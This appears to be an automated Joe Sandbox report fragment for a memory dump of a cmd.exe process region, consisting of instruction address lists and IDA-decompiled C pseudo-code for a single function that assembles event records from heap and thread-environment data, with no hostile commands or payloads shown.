0x036cff61
0x036cff61
0x036cff63
0x036d0021
0x036d0026
0x036d002b
0x036d007e
0x036d0080
0x036d0080
0x036d007e
0x036d002f
0x00000000
0x036d0031
0x036d0033
0x036d0086
0x036d0035
0x036d0035
0x036d0035
0x036d003c
0x00000000
0x036d003c
0x036d002f
0x036cff69
0x036cff6b
0x03725f8c
0x03725f92
0x03725f92
0x03725f8c
0x036cff74
0x036cff77
0x036cff7b
0x03725f99
0x03725f9b
0x036cff81
0x036cff81
0x036cff83
0x036cff83
0x036cff88
0x036cff8b
0x036cff90
0x036cff92
0x036cff92
0x036cff9c
0x036cffa2
0x036cffa6
0x036cffaa
0x036cffad
0x036cffb2
0x03725fa4
0x03725faa
0x03725faa
0x03725fa4
0x036cffb8
0x00000000
0x036cffb8
0x036cff5b
0x036d0054
0x03725f3e
0x03725f3e
0x036cff09
0x00000000
0x00000000
0x036cff0f
0x036cff14
0x03725f47
0x03725f4d
0x03725f4d
0x03725f47
0x036cff1c
0x036d0046
0x036d0076
0x036d0078
0x00000000
0x036d0048
0x036d0048
0x036d004a
0x036d004a
0x00000000
0x036d004a
0x036cff22
0x036cff22
0x036cff26
0x03725f56
0x03725f5c
0x03725f5c
0x03725f56
0x036cff2e
0x00000000
0x036cff34
0x036cff36
0x03725f65
0x036cff3c
0x036cff3c
0x036cff3c
0x036cff3e
0x00000000
0x036cff3e
0x036cff2e
0x036cff1c
0x036cfef3
0x036cfee3
0x036cf9f9
0x036cf9f9
0x036cf9fb
0x036cf9ff
0x036cfbd5
0x03725fb1
0x03725fb1
0x036cfbdf
0x00000000
0x036cfbe5
0x036cfbe5
0x036cfbe8
0x036cfbed
0x03725fdf
0x036cfc01
0x036cfc01
0x036cfc04
0x036cfc09
0x03725fee
0x03725ff4
0x03725ff4
0x03725fee
0x036cfc0f
0x036cfc13
0x036cfc1d
0x036cfc20
0x036cfc23
0x036cfc26
0x036cfc2b
0x03725ffd
0x03726003
0x03726003
0x03725ffd
0x036cfc33
0x00000000
0x036cfc39
0x036cfc3b
0x036cfc3e
0x036cfc41
0x036cfc46
0x0372600c
0x03726012
0x03726012
0x0372600c
0x036cfc4e
0x00000000
0x036cfc54
0x036cfc54
0x036cfc59
0x0372601b
0x03726021
0x03726021
0x0372601b
0x036cfc61
0x00000000
0x036cfc67
0x036cfc6a
0x036cfc6f
0x0372602a
0x03726030
0x03726030
0x0372602a
0x036cfc77
0x00000000
0x036cfc7d
0x036cfc7f
0x036cfc81
0x036cfc85
0x036cfc87
0x036cfc87
0x036cfc8c
0x036cfc8f
0x036cfc94
0x03726039
0x036cfc9c
0x036cfca4
0x036cfcaa
0x036cfcaf
0x03726046
0x036cfcbd
0x036cfcbf
0x0372606d
0x03726073
0x03726073
0x0372606d
0x036cfcc8
0x036cfccd
0x036cfccf
0x036cfcd3
0x036cfcd5
0x036cfcd5
0x036cfcde
0x036cfce1
0x036cfce3
0x036cfce3
0x036cfce8
0x036cfcf0
0x036cfcf2
0x036cfcf5
0x036cfcf7
0x036cfcff
0x036cfd02
0x036cfd06
0x036cfd11
0x036cfd14
0x036cfd17
0x0372607c
0x03726082
0x03726082
0x0372607c
0x036cfd1f
0x00000000
0x036cfd25
0x036cfd28
0x036cfd2d
0x0372608b
0x03726091
0x03726091
0x0372608b
0x036cfd35
0x00000000
0x036cfd3b
0x036cfd3e
0x036cfd43
0x0372609a
0x036d0016
0x036d0018
0x00000000
0x036d001a
0x036d001a
0x036cfd82
0x036cfd84
0x037260d9
0x037260df
0x037260df
0x037260d9
0x036cfd8d
0x036cfd95
0x036cfd98
0x036cfd9d
0x037260e8
0x00000000
0x00000000
0x037260ee
0x00000000
0x036cfda3
0x036cfda3
0x036cfda5
0x036cfe8b
0x036cfe90
0x036cfe95
0x037260f7
0x037260fd
0x037260fd
0x037260f7
0x036cfe9d
0x00000000
0x036cfea3
0x036cfea5
0x03726106
0x036cfeab
0x036cfeab
0x036cfeab
0x036cfeb2
0x036cfeb5
0x00000000
0x036cfeb5
0x036cfe9d
0x036cfdab
0x036cfdad
0x0372610f
0x03726115
0x03726115
0x0372610f
0x036cfdb6
0x036cfdbb
0x0372611e
0x03726120
0x036cfdc1
0x036cfdc1
0x036cfdc5
0x036cfdc5
0x036cfdc7
0x036cfdcc
0x036cfdce
0x036cfdce
0x036cfdd6
0x036cfdd8
0x00000000
0x036cfdd8
0x036cfd9d
0x036d0018
0x037260a0
0x037260a0
0x036cfd4b
0x00000000
0x00000000
0x036cfd51
0x036cfd56
0x037260a9
0x037260af
0x037260af
0x037260a9
0x036cfd5e
0x036cfebf
0x037260b8
0x036cfec5
0x036cfec5
0x036cfec5
0x036cfec7
0x00000000
0x036cfd64
0x036cfd64
0x036cfd68
0x037260c1
0x037260c7
0x037260c7
0x037260c1
0x036cfd70
0x00000000
0x036cfd76
0x036cfd78
0x037260d0
0x036cfd7e
0x036cfd7e
0x036cfd7e
0x036cfd80
0x00000000
0x036cfd80
0x036cfd70
0x036cfd5e
0x036cfd35
0x036cfd1f
0x0372604c
0x0372604c
0x036cfcb7
0x036cffc0
0x036cffc3
0x036cffc6
0x036cffcb
0x03726055
0x0372605b
0x0372605b
0x03726055
0x036cffd3
0x00000000
0x036cffd9
0x036cffdb
0x03726064
0x036cffe1
0x036cffe1
0x036cffe1
0x036cffe3
0x036cffe7
0x036cffed
0x00000000
0x036cffed
0x036cffd3
0x00000000
0x036cfcb7
0x0372603f
0x036cfc9a
0x00000000
0x036cfc9a
0x036cfc77
0x036cfc61
0x036cfc4e
0x036cfc33
0x03725fe5
0x03725fe5
0x036cfbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x036cfbf5
0x036cfbdf
0x036cfa05
0x036cfa05
0x036cfa0a
0x036cfe14
0x03725fb8
0x03725fb8
0x036cfe1e
0x00000000
0x036cfe24
0x00000000
0x036cfe24
0x036cfe1e
0x036cfa10
0x036cfa10
0x036cfa15
0x036cfe29
0x036cfe2d
0x036cfe35
0x036cfe38
0x036cfe3b
0x03725fc1
0x00000000
0x00000000
0x03725fc7
0x036cfe43
0x036cfe45
0x00000000
0x00000000
0x036cfe4b
0x036cfe50
0x03725fd0
0x03725fd6
0x03725fd6
0x03725fd0
0x036cfe5d
0x036cfe60
0x00000000
0x036cfe60
0x036cfe41
0x036cfe41
0x00000000
0x036cfa1b
0x036cfa1b
0x036cfa1d
0x036cfa20
0x00000000
0x036cfa20
0x036cfa15
0x036cf9ed
0x036cf9ed
0x00000000
0x036cf9ed
0x036cf9cd
0x036cf9ba
0x036cf9ba
0x00000000
0x036cf9ba
0x036cfba8
0x036cfb65
0x036cfb1d
0x036cfb23
0x036cfb26
0x00000000
0x036cfb26
0x036cfaf3
0x036cfaf3
0x00000000
0x036cfaf3
0x036cfab4
0x036cfa79
0x036cfa56
0x036cfa56
0x00000000
0x036cfa56
0x036cf94d
0x036cf950
0x036cf955
0x03725e79
0x03725e7f
0x03725e7f
0x03725e79
0x036cf95b
0x036cf960
0x03725e88
0x03725e8a
0x03725e8a
0x03725e8e
0x03725e93
0x00000000
0x03725e99
0x03725e9c
0x03725e9f
0x03725ea1
0x03725ea3
0x03725ea3
0x03725ea7
0x00000000
0x03725ea7
0x036cf966
0x036cf966
0x036cf96b
0x03725eb0
0x03725eb6
0x03725eb6
0x03725eb0
0x036cf973
0x036cfbc7
0x036cf9a5
0x036cf9a5
0x00000000
0x036cf979
0x036cf97d
0x036cf97f
0x03725ebf
0x03725ec5
0x03725ec5
0x03725ebf
0x036cf987
0x00000000
0x036cf98d
0x036cf98d
0x036cf990
0x036cf994
0x036cf997
0x036cf99f
0x036cfff7
0x036d0061
0x036d0064
0x036d006a
0x03725ece
0x03725ed0
0x03725ed0
0x00000000
0x036d0064
0x036cfffd
0x036d0000
0x00000000
0x036d0006
0x03725ecc
0x00000000
0x03725ecc
0x036d0000
0x00000000
0x036cf99f
0x036cf987
0x036cf973

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: f054ef0f90bbb9261de5e57f5178d57e6a9b9c892dd04829cfecb9a6a60dbce3
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: E062C636E246A69BCF31CE68864037AFBB6EF45624F2D859DCC659F341D371D8428780

Uniqueness

Uniqueness Score: -1.00%

Function 03795BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E03795BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x37a1178);
				E0371D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03794C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0370D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03795542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x37b60e8;
								if( *0x37b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x37b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03709710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03706DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0370F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0370F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0370F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0370FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0370FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0370F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0370F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03794CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0371D130(_t427, _t494, _t511);
				}
			}

0x03795ba5
0x03795baa
0x03795baf
0x03795bb4
0x03795bb6
0x03795bbc
0x03795bbe
0x03795bc4
0x03795bcd
0x03795bd3
0x03795bd6
0x03795bdc
0x03795be0
0x03795be3
0x03795beb
0x03795bf2
0x03795bf8
0x03795bfe
0x03795c04
0x03795c0e
0x03795c18
0x03795c1f
0x03795c25
0x03795c2a
0x03795c2c
0x03795c32
0x03795c3a
0x03795c3f
0x03795c42
0x03795c48
0x03795c5b
0x03795c5b
0x03795c2c
0x03795cb7
0x03795cb9
0x03795cbf
0x03795cc2
0x03795cca
0x03795ccb
0x03795ccb
0x03795cd1
0x03795cd7
0x03795cda
0x03795ce1
0x03795ce4
0x03795ce7
0x03795ced
0x03795cf3
0x03795cf9
0x03795cff
0x03795d08
0x03795d0a
0x03795d0e
0x03795d10
0x00000000
0x00000000
0x03795d16
0x03795d1a
0x00000000
0x00000000
0x03795d20
0x03795d22
0x03795d25
0x03795d2f
0x03795d2f
0x03795d33
0x03795d3d
0x03795d49
0x03795d4b
0x00000000
0x00000000
0x03795d5a
0x03795d5d
0x03795d60
0x00000000
0x00000000
0x03795d66
0x03795d69
0x00000000
0x00000000
0x03795d6f
0x03795d6f
0x03795d73
0x03795d79
0x03795d7f
